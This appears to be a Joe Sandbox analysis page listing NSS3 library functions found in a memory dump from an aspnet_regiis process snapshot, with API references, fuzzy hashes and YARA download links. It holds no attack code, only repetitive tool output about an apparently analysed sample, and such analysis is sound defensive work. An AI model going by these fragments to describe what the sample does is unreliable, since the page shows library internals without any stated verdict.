Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: d8f11f2d16d74f426332485121c8a2c6dc15112336d72fa95ea168d91af398b9
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: F9417EB2A012118BDB18CF58DCE1B9AB7E1BF4531871D466DD84ACBB02E375E891CB81

Function 6C4DA860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C4DA690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C4DA662), ref: 6C4DA69E
Part of subcall function 6C4DA690: PR_NewCondVar.NSS3(?), ref: 6C4DA6B4

PR_IntervalNow.NSS3 ref: 6C4DA8C6
EnterCriticalSection.KERNEL32(?), ref: 6C4DA8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C4DA944
PR_SetPollableEvent.NSS3(?), ref: 6C4DA94F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: b18e6a4ab83b35bab3df97657408d040e9b6bb8acc725c1a18a509bba04a2d71
Instruction ID: bf8f8fa9e7d3c7ccea0c7d06a7d6a5523c4ead9b1a9388e1cf600aa5dc1e36c2
Opcode Fuzzy Hash: b18e6a4ab83b35bab3df97657408d040e9b6bb8acc725c1a18a509bba04a2d71
Instruction Fuzzy Hash: 994136B4A01A029FC704DF29C590D56FBF1FF4831876A896AE94ACBB11E731F850CB90

Function 6C3C6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C3C6C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C3C6CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C3C6CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C4E8FE0), ref: 6C3C6CFE

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: f98d490ffe9e1d5d11da02d4c67f3e6aedf3b4e40b47892ebde5103cd84f304c
Instruction ID: d493820ef12c6cf5ddc821ac4ba06b419ca79832dce6e664ae7be74343aed19c
Opcode Fuzzy Hash: f98d490ffe9e1d5d11da02d4c67f3e6aedf3b4e40b47892ebde5103cd84f304c
Instruction Fuzzy Hash: 27317EB1A012169FEB04DF65C895ABFBBF5EF85248B10443DD905D7700EB329D05CBA1

Function 6C4D4F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C4D4F5D
free.MOZGLUE(?), ref: 6C4D4F74
free.MOZGLUE(?), ref: 6C4D4F82
GetLastError.KERNEL32 ref: 6C4D4F90

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 83e2f4563e76f2fc5a23a42ace918a31535de01528975e07806f369440d3ba9f
Instruction ID: 5ec31b744150dbc5a42e3ab7a020ee8687ab1bef1c259aa3354c524aab9e4f03
Opcode Fuzzy Hash: 83e2f4563e76f2fc5a23a42ace918a31535de01528975e07806f369440d3ba9f
Instruction Fuzzy Hash: A53137B5A002094BEB01EB68DC95FDEB3F8EF45399F06022DEC15A7780D734F9058692

Function 6C432880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C432896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C432932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C43294C
free.MOZGLUE(?), ref: 6C432955

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: 4c585e3281c734ecca92835558e69b39db6e0ed7ce8a8ff2b4d29336d7dd2b23
Instruction ID: 53bd99fde18da91f18da9176cfb32edcaaa30f0e23eecdd2973123263675bbe6
Opcode Fuzzy Hash: 4c585e3281c734ecca92835558e69b39db6e0ed7ce8a8ff2b4d29336d7dd2b23
Instruction Fuzzy Hash: 58219FB66006109BE721CA26EC09F5776E5AFC8359F15053CE88D87B62EF32E41886D1

Function 6C404FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C40B60F,00000000), ref: 6C405003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C40B60F,00000000), ref: 6C40501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C40B60F,00000000), ref: 6C40504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C40B60F,00000000), ref: 6C405064

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: a2a059d1b9deaa951621fafc75a8f8592c99c6cca2cf147b655523fb155b4581
Instruction ID: cfd3447328ac2039174e25ce2bac8de28b6fd05657836ea5b1acef48df5849ee
Opcode Fuzzy Hash: a2a059d1b9deaa951621fafc75a8f8592c99c6cca2cf147b655523fb155b4581
Instruction Fuzzy Hash: 293114B4A05606CFDB00EF68C484E6EBBF4FF09345B158929D8599BB00E731E890CBD5

Function 6C432DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C432E08

Part of subcall function 6C4214C0: TlsGetValue.KERNEL32 ref: 6C4214E0
Part of subcall function 6C4214C0: EnterCriticalSection.KERNEL32 ref: 6C4214F5
Part of subcall function 6C4214C0: PR_Unlock.NSS3 ref: 6C42150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C432E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C432E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C432E95

Part of subcall function 6C421200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C421228
Part of subcall function 6C421200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C421238
Part of subcall function 6C421200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C42124B
Part of subcall function 6C421200: PR_CallOnce.NSS3(6C522AA4,6C4212D0,00000000,00000000,00000000,?,6C3C88A4,00000000,00000000), ref: 6C42125D
Part of subcall function 6C421200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C42126F
Part of subcall function 6C421200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C421280
Part of subcall function 6C421200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C42128E
Part of subcall function 6C421200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C42129A
Part of subcall function 6C421200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4212A1

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 4020473f3233f363487890b3415d50276324debfc3a8639daeba9f5b05c31dfc
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 33212571D003604BE710CF159C47FAA36646FE570CF111269DD0C5B782FBB6E58482D1

Function 6C3C69B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6C3C6AB7,0000000C,00000001,00000000,?,?,6C3C6AB7,?,00000000,?), ref: 6C3C69CE

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

SEC_ASN1EncodeItem_Util.NSS3(6C3C6AB7,0000001C,00000004,?,00000001,00000000), ref: 6C3C6A06
SEC_ASN1EncodeItem_Util.NSS3(6C3C6AB7,?,00000000,?,00000001,00000000,?,?,6C3C6AB7,?,00000000,?), ref: 6C3C6A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6C3C6AB7,?,00000000,?), ref: 6C3C6A42

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 824bdd9d162060a5d0f70465b5249b46f603897310a4a4f0ce7ce77bdffaee71
Instruction ID: 49a503c55080dba7ffe0d8e229d30e687f0dad87f4252ec014c41fedbe082421
Opcode Fuzzy Hash: 824bdd9d162060a5d0f70465b5249b46f603897310a4a4f0ce7ce77bdffaee71
Instruction Fuzzy Hash: 6411C1B5B41201AFE710CE65CC80F7A77BCEB4425CF508529EA19D3E41E332EC15CAA2

Function 6C3EACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C3EACC2

Part of subcall function 6C3C2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C3C2F0A
Part of subcall function 6C3C2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C3C2F1D

Part of subcall function 6C3C2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C3C0A1B,00000000), ref: 6C3C2AF0
Part of subcall function 6C3C2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3C2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C3EAD5E

Part of subcall function 6C4057D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C3CB41E,00000000,00000000,?,00000000,?,6C3CB41E,00000000,00000000,00000001,?), ref: 6C4057E0
Part of subcall function 6C4057D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C405843

CERT_DestroyCertList.NSS3(?), ref: 6C3EAD36

Part of subcall function 6C3C2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C3C2F65
Part of subcall function 6C3C2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3C2F83

free.MOZGLUE(?), ref: 6C3EAD4F

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: a07dffbb86517c0375b60364cdc013c6e075627aea7df1ead24b10c44ac81b68
Instruction ID: 0b37174f8737caa436b19eedd6a509af5b0ccbe2ef0dcff03a02cfd4c53c0ef7
Opcode Fuzzy Hash: a07dffbb86517c0375b60364cdc013c6e075627aea7df1ead24b10c44ac81b68
Instruction Fuzzy Hash: 1421F9B1D001188BEB10EF64D9055EE7BB4EF09218F064069D845B7700FB32AD55CFE2

Function 6C41ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C41F0AD,6C41F150,?,6C41F150,?,?,?), ref: 6C41ECBA

Part of subcall function 6C420FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3C87ED,00000800,6C3BEF74,00000000), ref: 6C421000
Part of subcall function 6C420FF0: PR_NewLock.NSS3(?,00000800,6C3BEF74,00000000), ref: 6C421016
Part of subcall function 6C420FF0: PL_InitArenaPool.NSS3(00000000,security,6C3C87ED,00000008,?,00000800,6C3BEF74,00000000), ref: 6C42102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C41ECD1

Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C4210F3
Part of subcall function 6C4210C0: EnterCriticalSection.KERNEL32(?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42110C
Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421141
Part of subcall function 6C4210C0: PR_Unlock.NSS3(?,?,?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C421182
Part of subcall function 6C4210C0: TlsGetValue.KERNEL32(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C41ED02

Part of subcall function 6C4210C0: PL_ArenaAllocate.NSS3(?,6C3C8802,00000000,00000008,?,6C3BEF74,00000000), ref: 6C42116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C41ED5A

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: cf911896285f87150d156ebeceffabb08727e77f535a8dc1f47e956c12766806
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 2C21CFB5A147429BE700CF25D988F62B7E4AFA4309F258219A81C87F61EB70E994C7D0

Function 6C3EC860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C3EC890

Part of subcall function 6C3E8F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FAF
Part of subcall function 6C3E8F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FD1
Part of subcall function 6C3E8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E8FFA
Part of subcall function 6C3E8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C3E9013
Part of subcall function 6C3E8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C3E9042
Part of subcall function 6C3E8F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C3E905A
Part of subcall function 6C3E8F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C3E9073
Part of subcall function 6C3E8F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C3DDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C3E9111

PR_GetCurrentThread.NSS3 ref: 6C3EC8B2

Part of subcall function 6C489BF0: TlsGetValue.KERNEL32(?,?,?,6C4D0A75), ref: 6C489C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C3EC8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C3EC8EB

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: fbe238f0cf96c5b6875ec11515d0fc6142e935465f9ba6bf4baf3b9ccee12a4e
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: DB01A576E112356BE7002AB97D80ABF3E699B5925CF040137FD04A6B01F76298199BE3

Function 6C414900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C3FC79F,?,?,6C415C4A,?), ref: 6C414950

Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418821
Part of subcall function 6C418800: TlsGetValue.KERNEL32(?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C41883D
Part of subcall function 6C418800: EnterCriticalSection.KERNEL32(?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418856
Part of subcall function 6C418800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C418887
Part of subcall function 6C418800: PR_Unlock.NSS3(?,?,?,?,6C42085A,00000000,?,6C3C8369,?), ref: 6C418899

TlsGetValue.KERNEL32(?,?,?), ref: 6C41496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C41497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C414989

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 56d6b4b28e19295868bf9934d62a17e77b4d6797ee7fde3e5ed81c300712b396
Instruction ID: a1f322c2c3883327a5eed491c5800a4ae9e6cf43f7bad137f93707392746e2b6
Opcode Fuzzy Hash: 56d6b4b28e19295868bf9934d62a17e77b4d6797ee7fde3e5ed81c300712b396
Instruction Fuzzy Hash: D411E2B5B182009BEB00EF38DC45E2677B8BB063ADB151139ED8997F11E722E81586D9

Function 6C44EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C437FFA,?,6C439767,?,8B7874C0,0000A48E), ref: 6C44EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C437FFA,?,6C439767,?,8B7874C0,0000A48E), ref: 6C44EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C437FFA,?,6C439767,?,8B7874C0,0000A48E), ref: 6C44EE14

Part of subcall function 6C420BE0: malloc.MOZGLUE(6C418D2D,?,00000000,?), ref: 6C420BF8
Part of subcall function 6C420BE0: TlsGetValue.KERNEL32(6C418D2D,?,00000000,?), ref: 6C420C15

memcpy.VCRUNTIME140(?,?,6C439767,00000000,00000000,6C437FFA,?,6C439767,?,8B7874C0,0000A48E), ref: 6C44EE33

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
